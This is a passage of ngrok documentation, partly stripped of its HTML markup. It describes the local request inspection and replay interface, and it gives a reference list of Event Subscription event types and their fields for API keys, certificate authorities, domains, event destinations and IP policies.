+ Every HTTP request through your tunnels will be displayed in the inspection interface. After you start ngrok, open http://localhost:4040 in a browser. + You will see all of the details of every request and response including the time, duration, source IP, headers, query parameters, request payload and response body as well as the raw bytes on the wire. +

+

+ The inspection interface has a few limitations. If an entity-body is too long, ngrok may only capture the initial portion of the request body. Furthermore, ngrok does not display provisional 100 responses from a server. +

+
+ Inspection is only supported for http tunnels. tcp and tls tunnels do not support any inspection. +
+
Detailed introspection of HTTP requests and responses
+

Request body validation

+

+ ngrok has special support for the most common data interchange formats in use on the web. Any XML or JSON data in request or response bodies is automatically pretty-printed for you and checked for syntax errors. +

+
The location of a JSON syntax error is highlighted
+

Filtering requests

+

+ Your application server may receive many requests, but you are often only interested in inspecting some of them. You can filter + the requests that ngrok displays to you. You can filter based on the request path, response status code, + size of the response body, duration of the request and the value of any header. +

+
Click the filter bar for filtering options
+ +

+
+ You may specify multiple filters. If you do, requests will only be shown if they match all filters. +

+
Filter requests by path and status code
+ +

Replaying requests

+

+ Developing for webhooks issued by external APIs can often slow down your development cycle by requiring you do some work, like dialing a phone, to trigger the hook request. ngrok allows you to replay any request with a single click, dramatically speeding up your iteration cycle. Click the Replay button at the top-right corner of any request on the web inspection UI to replay it. +

+
Replay any request against your tunneled web server with one click
+ +

Replaying modified requests

+

+ Sometimes you want to modify a request before you replay it to test a new behavior in your application server. +

+
Click the dropdown arrow on the 'Replay' button to modify a request before it is replayed
+ +

+
+ The replay editor allows you to modify every aspect of the http request before replaying it, including the + method, path, headers, trailers and request body. +

+
The request replay modification editor
+ +

Status page: metrics and configuration

+

+ ngrok's local web interface has a dedicated status page that shows configuration and metrics + information about the running ngrok process. You can access it at http://localhost:4040/status. +

+

+ The status page displays the configuration of each running tunnel and any global configuration options + that ngrok has parsed from its configuration file. +

+
Tunnel and global configuration
+ +

+
+ The status page also displays metrics about the traffic through each tunnel. It displays connection rates and connection duration + percentiles for all tunnels. For http tunnels, it also displays http request rates and http response duration percentiles. +

+
Tunnel traffic metrics
+ + +

Event Subscriptions

+

Event Subscriptions capture events from your ngrok account and send them to configurable destinations like Amazon CloudWatch Logs, Amazon Kinesis (as a data stream) or Amazon Kinesis Firehose (as a delivery stream).

+

You might create an Event Subscription to audit every time a team member gets created, updated, and deleted in your ngrok account, or every time somebody connects to an ngrok tunnel.

+

Event Types

+

Many objects within ngrok have corresponding events that are generated when an instance of the object is created, updated and deleted. For example, an event of type ip_policy_created.v0 is generated when an IP Policy is created. All Event Types have a version, represented in the Event Type string following the period. The initial version for all Event Types is v0.

+

Parts of an Event Subscription

+

You can think of an Event Subscription as a set of Sources attached to one or more Destinations. Sources define which events to capture, and Destinations specify where to send those events.

+

Event Sources

+

An Event Source specifies the type of event to capture. A single Event Subscription can have many Sources.

+

Some event types support filters and selectable fields. Not all selectable fields are usable in filters. A full list of event types and their fields follows. A field marked `filterable` indicates that it is usable in the filter for an event source.

+ +
api_key_created.v0
+

Triggers when an API key is created

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique API key resource identifier

+
uristring

URI to the API resource of this API key

+
descriptionstring

human-readable description of what uses the API key to authenticate. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined data of this API key. optional, max 4096 bytes

+
created_atstring

timestamp when the api key was created, RFC 3339 format

+
tokenstring

the bearer token that can be placed into the Authorization header to authenticate requests to the ngrok API. This value is only available one time, on the API response from key creation. Otherwise it is null.

+
+
api_key_deleted.v0
+

Triggers when an API key is deleted

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique API key resource identifier

+
uristring

URI to the API resource of this API key

+
descriptionstring

human-readable description of what uses the API key to authenticate. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined data of this API key. optional, max 4096 bytes

+
created_atstring

timestamp when the api key was created, RFC 3339 format

+
tokenstring

the bearer token that can be placed into the Authorization header to authenticate requests to the ngrok API. This value is only available one time, on the API response from key creation. Otherwise it is null.

+
+
api_key_updated.v0
+

Triggers when an API key is updated

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique API key resource identifier

+
uristring

URI to the API resource of this API key

+
descriptionstring

human-readable description of what uses the API key to authenticate. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined data of this API key. optional, max 4096 bytes

+
created_atstring

timestamp when the api key was created, RFC 3339 format

+
tokenstring

the bearer token that can be placed into the Authorization header to authenticate requests to the ngrok API. This value is only available one time, on the API response from key creation. Otherwise it is null.

+
+
certificate_authority_created.v0
+

Triggers when a certificate authority is created

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this Certificate Authority

+
uristring

URI of the Certificate Authority API resource

+
created_atstring

timestamp when the Certificate Authority was created, RFC 3339 format

+
descriptionstring

human-readable description of this Certificate Authority. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this Certificate Authority. optional, max 4096 bytes.

+
ca_pemstring

raw PEM of the Certificate Authority

+
subject_common_namestring

subject common name of the Certificate Authority

+
not_beforestring

timestamp when this Certificate Authority becomes valid, RFC 3339 format

+
not_afterstring

timestamp when this Certificate Authority becomes invalid, RFC 3339 format

+
key_usagesList<string>

set of actions the private key of this Certificate Authority can be used for

+
extended_key_usagesList<string>

extended set of actions the private key of this Certificate Authority can be used for

+
+
certificate_authority_deleted.v0
+

Triggers when a certificate authority is deleted

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this Certificate Authority

+
uristring

URI of the Certificate Authority API resource

+
created_atstring

timestamp when the Certificate Authority was created, RFC 3339 format

+
descriptionstring

human-readable description of this Certificate Authority. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this Certificate Authority. optional, max 4096 bytes.

+
ca_pemstring

raw PEM of the Certificate Authority

+
subject_common_namestring

subject common name of the Certificate Authority

+
not_beforestring

timestamp when this Certificate Authority becomes valid, RFC 3339 format

+
not_afterstring

timestamp when this Certificate Authority becomes invalid, RFC 3339 format

+
key_usagesList<string>

set of actions the private key of this Certificate Authority can be used for

+
extended_key_usagesList<string>

extended set of actions the private key of this Certificate Authority can be used for

+
+
certificate_authority_updated.v0
+

Triggers when a certificate authority is updated

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this Certificate Authority

+
uristring

URI of the Certificate Authority API resource

+
created_atstring

timestamp when the Certificate Authority was created, RFC 3339 format

+
descriptionstring

human-readable description of this Certificate Authority. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this Certificate Authority. optional, max 4096 bytes.

+
ca_pemstring

raw PEM of the Certificate Authority

+
subject_common_namestring

subject common name of the Certificate Authority

+
not_beforestring

timestamp when this Certificate Authority becomes valid, RFC 3339 format

+
not_afterstring

timestamp when this Certificate Authority becomes invalid, RFC 3339 format

+
key_usagesList<string>

set of actions the private key of this Certificate Authority can be used for

+
extended_key_usagesList<string>

extended set of actions the private key of this Certificate Authority can be used for

+
+
domain_created.v0
+

Triggers when a domain is created

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique reserved domain resource identifier

+
uristring

URI of the reserved domain API resource

+
created_atstring

timestamp when the reserved domain was created, RFC 3339 format

+
descriptionstring

human-readable description of what this reserved domain will be used for

+
metadatastring

arbitrary user-defined machine-readable data of this reserved domain. Optional, max 4096 bytes.

+
domainstring

hostname of the reserved domain

+
regionstring

reserve the domain in this geographic ngrok datacenter. Optional, default is us. (au, eu, ap, us, jp, in, sa)

+
cname_targetstring

DNS CNAME target for a custom hostname, or null if the reserved domain is a subdomain of *.ngrok.io

+
certificate.idstring

a resource identifier

+
certificate.uristring

a uri for locating a resource

+
certificate_management_policy.authoritystring

certificate authority to request certificates from. The only supported value is letsencrypt.

+
certificate_management_policy.private_key_typestring

type of private key to use when requesting certificates. Defaults to rsa, can be either rsa or ecdsa.

+
certificate_management_status.renews_atstring

timestamp when the next renewal will be requested, RFC 3339 format

+
certificate_management_status.provisioning_job.error_codestring

if present, an error code indicating why provisioning is failing. It may be either a temporary condition (INTERNAL_ERROR), or a permanent one the user must correct (DNS_ERROR).

+
certificate_management_status.provisioning_job.msgstring

a message describing the current status or error

+
certificate_management_status.provisioning_job.started_atstring

timestamp when the provisioning job started, RFC 3339 format

+
certificate_management_status.provisioning_job.retries_atstring

timestamp when the provisioning job will be retried

+
acme_challenge_cname_targetstring

DNS CNAME target for the host _acme-challenge.example.com, where example.com is your reserved domain name. This is required to issue certificates for wildcard, non-ngrok reserved domains. Must be null for non-wildcard domains and ngrok subdomains.

+
+
domain_deleted.v0
+

Triggers when a domain is deleted

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique reserved domain resource identifier

+
uristring

URI of the reserved domain API resource

+
created_atstring

timestamp when the reserved domain was created, RFC 3339 format

+
descriptionstring

human-readable description of what this reserved domain will be used for

+
metadatastring

arbitrary user-defined machine-readable data of this reserved domain. Optional, max 4096 bytes.

+
domainstring

hostname of the reserved domain

+
regionstring

reserve the domain in this geographic ngrok datacenter. Optional, default is us. (au, eu, ap, us, jp, in, sa)

+
cname_targetstring

DNS CNAME target for a custom hostname, or null if the reserved domain is a subdomain of *.ngrok.io

+
certificate.idstring

a resource identifier

+
certificate.uristring

a uri for locating a resource

+
certificate_management_policy.authoritystring

certificate authority to request certificates from. The only supported value is letsencrypt.

+
certificate_management_policy.private_key_typestring

type of private key to use when requesting certificates. Defaults to rsa, can be either rsa or ecdsa.

+
certificate_management_status.renews_atstring

timestamp when the next renewal will be requested, RFC 3339 format

+
certificate_management_status.provisioning_job.error_codestring

if present, an error code indicating why provisioning is failing. It may be either a temporary condition (INTERNAL_ERROR), or a permanent one the user must correct (DNS_ERROR).

+
certificate_management_status.provisioning_job.msgstring

a message describing the current status or error

+
certificate_management_status.provisioning_job.started_atstring

timestamp when the provisioning job started, RFC 3339 format

+
certificate_management_status.provisioning_job.retries_atstring

timestamp when the provisioning job will be retried

+
acme_challenge_cname_targetstring

DNS CNAME target for the host _acme-challenge.example.com, where example.com is your reserved domain name. This is required to issue certificates for wildcard, non-ngrok reserved domains. Must be null for non-wildcard domains and ngrok subdomains.

+
+
domain_updated.v0
+

Triggers when a domain is updated

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique reserved domain resource identifier

+
uristring

URI of the reserved domain API resource

+
created_atstring

timestamp when the reserved domain was created, RFC 3339 format

+
descriptionstring

human-readable description of what this reserved domain will be used for

+
metadatastring

arbitrary user-defined machine-readable data of this reserved domain. Optional, max 4096 bytes.

+
domainstring

hostname of the reserved domain

+
regionstring

reserve the domain in this geographic ngrok datacenter. Optional, default is us. (au, eu, ap, us, jp, in, sa)

+
cname_targetstring

DNS CNAME target for a custom hostname, or null if the reserved domain is a subdomain of *.ngrok.io

+
certificate.idstring

a resource identifier

+
certificate.uristring

a uri for locating a resource

+
certificate_management_policy.authoritystring

certificate authority to request certificates from. The only supported value is letsencrypt.

+
certificate_management_policy.private_key_typestring

type of private key to use when requesting certificates. Defaults to rsa, can be either rsa or ecdsa.

+
certificate_management_status.renews_atstring

timestamp when the next renewal will be requested, RFC 3339 format

+
certificate_management_status.provisioning_job.error_codestring

if present, an error code indicating why provisioning is failing. It may be either a temporary condition (INTERNAL_ERROR), or a permanent one the user must correct (DNS_ERROR).

+
certificate_management_status.provisioning_job.msgstring

a message describing the current status or error

+
certificate_management_status.provisioning_job.started_atstring

timestamp when the provisioning job started, RFC 3339 format

+
certificate_management_status.provisioning_job.retries_atstring

timestamp when the provisioning job will be retried

+
acme_challenge_cname_targetstring

DNS CNAME target for the host _acme-challenge.example.com, where example.com is your reserved domain name. This is required to issue certificates for wildcard, non-ngrok reserved domains. Must be null for non-wildcard domains and ngrok subdomains.

+
+
event_destination_created.v0
+

Triggers when an Event Destination is created

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

Unique identifier for this Event Destination.

+
metadatastring

Arbitrary user-defined machine-readable data of this Event Destination. Optional, max 4096 bytes.

+
created_atstring

Timestamp when the Event Destination was created, RFC 3339 format.

+
descriptionstring

Human-readable description of the Event Destination. Optional, max 255 bytes.

+
formatstring

The output format you would like to serialize events into when sending to their target. Currently the only accepted value is JSON.

+
target.firehose.auth.role.role_arnstring

An ARN that specifies the role that ngrok should use to deliver to the configured target.

+
target.firehose.auth.creds.aws_access_key_idstring

The ID portion of an AWS access key.

+
target.firehose.auth.creds.aws_secret_access_keystring

The secret portion of an AWS access key.

+
target.firehose.delivery_stream_arnstring

An Amazon Resource Name specifying the Firehose delivery stream to deposit events into.

+
target.kinesis.auth.role.role_arnstring

An ARN that specifies the role that ngrok should use to deliver to the configured target.

+
target.kinesis.auth.creds.aws_access_key_idstring

The ID portion of an AWS access key.

+
target.kinesis.auth.creds.aws_secret_access_keystring

The secret portion of an AWS access key.

+
target.kinesis.stream_arnstring

An Amazon Resource Name specifying the Kinesis stream to deposit events into.

+
target.cloudwatch_logs.auth.role.role_arnstring

An ARN that specifies the role that ngrok should use to deliver to the configured target.

+
target.cloudwatch_logs.auth.creds.aws_access_key_idstring

The ID portion of an AWS access key.

+
target.cloudwatch_logs.auth.creds.aws_secret_access_keystring

The secret portion of an AWS access key.

+
target.cloudwatch_logs.log_group_arnstring

An Amazon Resource Name specifying the CloudWatch Logs group to deposit events into.

+
uristring

URI of the Event Destination API resource.

+
+
event_destination_deleted.v0
+

Triggers when an Event Destination is deleted

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

Unique identifier for this Event Destination.

+
metadatastring

Arbitrary user-defined machine-readable data of this Event Destination. Optional, max 4096 bytes.

+
created_atstring

Timestamp when the Event Destination was created, RFC 3339 format.

+
descriptionstring

Human-readable description of the Event Destination. Optional, max 255 bytes.

+
formatstring

The output format you would like to serialize events into when sending to their target. Currently the only accepted value is JSON.

+
target.firehose.auth.role.role_arnstring

An ARN that specifies the role that ngrok should use to deliver to the configured target.

+
target.firehose.auth.creds.aws_access_key_idstring

The ID portion of an AWS access key.

+
target.firehose.auth.creds.aws_secret_access_keystring

The secret portion of an AWS access key.

+
target.firehose.delivery_stream_arnstring

An Amazon Resource Name specifying the Firehose delivery stream to deposit events into.

+
target.kinesis.auth.role.role_arnstring

An ARN that specifies the role that ngrok should use to deliver to the configured target.

+
target.kinesis.auth.creds.aws_access_key_idstring

The ID portion of an AWS access key.

+
target.kinesis.auth.creds.aws_secret_access_keystring

The secret portion of an AWS access key.

+
target.kinesis.stream_arnstring

An Amazon Resource Name specifying the Kinesis stream to deposit events into.

+
target.cloudwatch_logs.auth.role.role_arnstring

An ARN that specifies the role that ngrok should use to deliver to the configured target.

+
target.cloudwatch_logs.auth.creds.aws_access_key_idstring

The ID portion of an AWS access key.

+
target.cloudwatch_logs.auth.creds.aws_secret_access_keystring

The secret portion of an AWS access key.

+
target.cloudwatch_logs.log_group_arnstring

An Amazon Resource Name specifying the CloudWatch Logs group to deposit events into.

+
uristring

URI of the Event Destination API resource.

+
+
event_destination_updated.v0
+

Triggers when an Event Destination is updated

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

Unique identifier for this Event Destination.

+
metadatastring

Arbitrary user-defined machine-readable data of this Event Destination. Optional, max 4096 bytes.

+
created_atstring

Timestamp when the Event Destination was created, RFC 3339 format.

+
descriptionstring

Human-readable description of the Event Destination. Optional, max 255 bytes.

+
formatstring

The output format you would like to serialize events into when sending to their target. Currently the only accepted value is JSON.

+
target.firehose.auth.role.role_arnstring

An ARN that specifies the role that ngrok should use to deliver to the configured target.

+
target.firehose.auth.creds.aws_access_key_idstring

The ID portion of an AWS access key.

+
target.firehose.auth.creds.aws_secret_access_keystring

The secret portion of an AWS access key.

+
target.firehose.delivery_stream_arnstring

An Amazon Resource Name specifying the Firehose delivery stream to deposit events into.

+
target.kinesis.auth.role.role_arnstring

An ARN that specifies the role that ngrok should use to deliver to the configured target.

+
target.kinesis.auth.creds.aws_access_key_idstring

The ID portion of an AWS access key.

+
target.kinesis.auth.creds.aws_secret_access_keystring

The secret portion of an AWS access key.

+
target.kinesis.stream_arnstring

An Amazon Resource Name specifying the Kinesis stream to deposit events into.

+
target.cloudwatch_logs.auth.role.role_arnstring

An ARN that specifies the role that ngrok should use to deliver to the configured target.

+
target.cloudwatch_logs.auth.creds.aws_access_key_idstring

The ID portion of an AWS access key.

+
target.cloudwatch_logs.auth.creds.aws_secret_access_keystring

The secret portion of an AWS access key.

+
target.cloudwatch_logs.log_group_arnstring

An Amazon Resource Name specifying the CloudWatch Logs group to deposit events into.

+
uristring

URI of the Event Destination API resource.

+
+
event_subscription_created.v0
+

Triggers when an Event Subscription is created

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

Unique identifier for this Event Subscription.

+
uristring

URI of the Event Subscription API resource.

+
created_atstring

When the Event Subscription was created (RFC 3339 format).

+
metadatastring

Arbitrary customer supplied information intended to be machine readable. Optional, max 4096 chars.

+
descriptionstring

Arbitrary customer supplied information intended to be human readable. Optional, max 255 chars.

+
sources.typestring

Type of event for which an event subscription will trigger

+
sources.uristring

URI of the Event Source API resource.

+
destinations.idstring

a resource identifier

+
destinations.uristring

a uri for locating a resource

+
+
event_subscription_deleted.v0
+

Triggers when an Event Subscription is deleted

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

Unique identifier for this Event Subscription.

+
uristring

URI of the Event Subscription API resource.

+
created_atstring

When the Event Subscription was created (RFC 3339 format).

+
metadatastring

Arbitrary customer supplied information intended to be machine readable. Optional, max 4096 chars.

+
descriptionstring

Arbitrary customer supplied information intended to be human readable. Optional, max 255 chars.

+
sources.typestring

Type of event for which an event subscription will trigger

+
sources.uristring

URI of the Event Source API resource.

+
destinations.idstring

a resource identifier

+
destinations.uristring

a uri for locating a resource

+
+
event_subscription_updated.v0
+

Triggers when an Event Subscription is updated

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

Unique identifier for this Event Subscription.

+
uristring

URI of the Event Subscription API resource.

+
created_atstring

When the Event Subscription was created (RFC 3339 format).

+
metadatastring

Arbitrary customer supplied information intended to be machine readable. Optional, max 4096 chars.

+
descriptionstring

Arbitrary customer supplied information intended to be human readable. Optional, max 255 chars.

+
sources.typestring

Type of event for which an event subscription will trigger

+
sources.uristring

URI of the Event Source API resource.

+
destinations.idstring

a resource identifier

+
destinations.uristring

a uri for locating a resource

+
+
http_request_complete.v0
+

Triggers when an HTTP request completes.

+

+This event type supports filters and selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
backend.connection_reusedbool

True if ngrok reused a TCP connection to transmit the HTTP request to the upstream service.

+
basic_auth.decisionstring

‘allow’ if the Basic Auth module permitted the request to the upstream service, otherwise ‘block’

+
basic_auth.usernamestring

The username in the HTTP basic auth credentials

+
circuit_breaker.decisionstring

Whether the HTTP request was sent to the upstream service. ‘allow’ if the breaker was closed, ‘block’ if the breaker was open, ‘allow_while_open’ if the request was allowed while the breaker is open

+
compression.algorithmstring

The compression algorithm used to encode responses from the endpoint. Either ‘gzip’, ‘deflate’, or ‘none’.

+
compression.bytes_savedint64

The difference between the size of the raw response and the size of the response as compressed by the Compression Module

+
conn.client_ipstringfilterable

The source IP of the TCP connection to the ngrok edge

+
conn.server_ipstringfilterable

The IP address of the server that received the request

+
conn.server_namestringfilterable

The hostname associated with this connection.

+
conn.server_portint32filterable

The port that the connection for this request came in on

+
conn.start_tstimestamp

The timestamp when the TCP connection to the ngrok edge is established

+
http.request.body_lengthint64

The size of the request body in bytes

+
http.request.headersMap<string, List<string>>

A map of normalized headers from the requesting client. Header keys are capitalized and header values are lowercased.

+
http.request.methodstring

The request method, normalized to lowercase

+
http.request.url.hoststring

The host component of the request URL

+
http.request.url.pathstring

The path component of the request URL

+
http.request.url.querystring

The query string component of the request URL

+
http.request.url.rawstring

The full URL of the request including scheme, host, path, and query string

+
http.request.url.schemestring

The scheme component of the request URL

+
http.request.user_agentstring

The value of the User-Agent header in the request received by ngrok edge

+
http.response.body_lengthint64

The size of the response body in bytes

+
http.response.headersMap<string, List<string>>

A map of normalized response headers. Header keys are capitalized and header values are lowercased.

+
http.response.status_codeint32

The status code of the response returned by the ngrok edge

+
ip_policy.decisionstring

‘allow’ if IP Policy module permitted the request to the upstream service, ‘block’ otherwise

+
oauth.app_client_idstring

The OAuth application client ID

+
oauth.decisionstring

‘allow’ if the OAuth module permitted the request to the upstream service, ‘block’ otherwise

+
oauth.user.idstring

The authenticated user’s ID returned by the OAuth provider

+
oauth.user.namestring

The authenticated user’s name returned by the OAuth provider

+
tls.cipher_suitestring

The cipher suite selected during the TLS handshake

+
tls.client_cert.serial_numberstring

The serial number of the client’s leaf TLS certificate in the Mutual TLS handshake

+
tls.client_cert.subject.cnstring

The subject common name of the client’s leaf TLS certificate in the Mutual TLS handshake

+
tls.versionstring

The version of the TLS protocol used between the client and the ngrok edge

+
webhook_validation.decisionstring

‘allow’ if the Webhook Verification module permitted the request to the upstream service, ‘block’ otherwise

+
+
ip_policy_created.v0
+

Triggers when an IP Policy is created

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this IP policy

+
uristring

URI of the IP Policy API resource

+
created_atstring

timestamp when the IP policy was created, RFC 3339 format

+
descriptionstring

human-readable description of the source IPs of this IP policy. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this IP policy. optional, max 4096 bytes.

+
actionstring

the IP policy action. Supported values are allow or deny

+
+
ip_policy_deleted.v0
+

Triggers when an IP Policy is deleted

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this IP policy

+
uristring

URI of the IP Policy API resource

+
created_atstring

timestamp when the IP policy was created, RFC 3339 format

+
descriptionstring

human-readable description of the source IPs of this IP policy. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this IP policy. optional, max 4096 bytes.

+
actionstring

the IP policy action. Supported values are allow or deny

+
+
ip_policy_rule_created.v0
+

Triggers when an IP Policy Rule is created

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this IP policy rule

+
uristring

URI of the IP policy rule API resource

+
created_atstring

timestamp when the IP policy rule was created, RFC 3339 format

+
descriptionstring

human-readable description of the source IPs of this IP rule. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this IP policy rule. optional, max 4096 bytes.

+
cidrstring

an IP or IP range specified in CIDR notation. IPv4 and IPv6 are both supported.

+
ip_policy.idstring

a resource identifier

+
ip_policy.uristring

a uri for locating a resource

+
+
ip_policy_rule_deleted.v0
+

Triggers when an IP Policy Rule is deleted

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this IP policy rule

+
uristring

URI of the IP policy rule API resource

+
created_atstring

timestamp when the IP policy rule was created, RFC 3339 format

+
descriptionstring

human-readable description of the source IPs of this IP rule. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this IP policy rule. optional, max 4096 bytes.

+
cidrstring

an IP or IP range specified in CIDR notation. IPv4 and IPv6 are both supported.

+
ip_policy.idstring

a resource identifier

+
ip_policy.uristring

a uri for locating a resource

+
+
ip_policy_rule_updated.v0
+

Triggers when an IP Policy Rule is updated

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this IP policy rule

+
uristring

URI of the IP policy rule API resource

+
created_atstring

timestamp when the IP policy rule was created, RFC 3339 format

+
descriptionstring

human-readable description of the source IPs of this IP rule. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this IP policy rule. optional, max 4096 bytes.

+
cidrstring

an IP or IP range specified in CIDR notation. IPv4 and IPv6 are both supported.

+
ip_policy.idstring

a resource identifier

+
ip_policy.uristring

a uri for locating a resource

+
+
ip_policy_updated.v0
+

Triggers when an IP Policy is updated

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this IP policy

+
uristring

URI of the IP Policy API resource

+
created_atstring

timestamp when the IP policy was created, RFC 3339 format

+
descriptionstring

human-readable description of the source IPs of this IP policy. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this IP policy. optional, max 4096 bytes.

+
actionstring

the IP policy action. Supported values are allow or deny

+
+
ip_restriction_created.v0
+

Triggers when an IP Restriction is created

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this IP restriction

+
uristring

URI of the IP restriction API resource

+
created_atstring

timestamp when the IP restriction was created, RFC 3339 format

+
descriptionstring

human-readable description of this IP restriction. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this IP restriction. optional, max 4096 bytes.

+
enforcedboolean

true if the IP restriction will be enforced. if false, only warnings will be issued

+
typestring

the type of IP restriction. this defines what traffic will be restricted with the attached policies. four values are currently supported: dashboard, api, agent, and endpoints

+
ip_policies.idstring

a resource identifier

+
ip_policies.uristring

a uri for locating a resource

+
+
ip_restriction_deleted.v0
+

Triggers when an IP Restriction is deleted

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this IP restriction

+
uristring

URI of the IP restriction API resource

+
created_atstring

timestamp when the IP restriction was created, RFC 3339 format

+
descriptionstring

human-readable description of this IP restriction. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this IP restriction. optional, max 4096 bytes.

+
enforcedboolean

true if the IP restriction will be enforced. if false, only warnings will be issued

+
typestring

the type of IP restriction. this defines what traffic will be restricted with the attached policies. four values are currently supported: dashboard, api, agent, and endpoints

+
ip_policies.idstring

a resource identifier

+
ip_policies.uristring

a uri for locating a resource

+
+
ip_restriction_updated.v0
+

Triggers when an IP Restriction is updated

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this IP restriction

+
uristring

URI of the IP restriction API resource

+
created_atstring

timestamp when the IP restriction was created, RFC 3339 format

+
descriptionstring

human-readable description of this IP restriction. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this IP restriction. optional, max 4096 bytes.

+
enforcedboolean

true if the IP restriction will be enforced. if false, only warnings will be issued

+
typestring

the type of IP restriction. this defines what traffic will be restricted with the attached policies. four values are currently supported: dashboard, api, agent, and endpoints

+
ip_policies.idstring

a resource identifier

+
ip_policies.uristring

a uri for locating a resource

+
+
ssh_certificate_authority_created.v0
+

Triggers when an SSH certificate authority is created

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this SSH Certificate Authority

+
uristring

URI of the SSH Certificate Authority API resource

+
created_atstring

timestamp when the SSH Certificate Authority API resource was created, RFC 3339 format

+
descriptionstring

human-readable description of this SSH Certificate Authority. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this SSH Certificate Authority. optional, max 4096 bytes.

+
public_keystring

raw public key for this SSH Certificate Authority

+
key_typestring

the type of private key for this SSH Certificate Authority

+
+
ssh_certificate_authority_deleted.v0
+

Triggers when an SSH certificate authority is deleted

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this SSH Certificate Authority

+
uristring

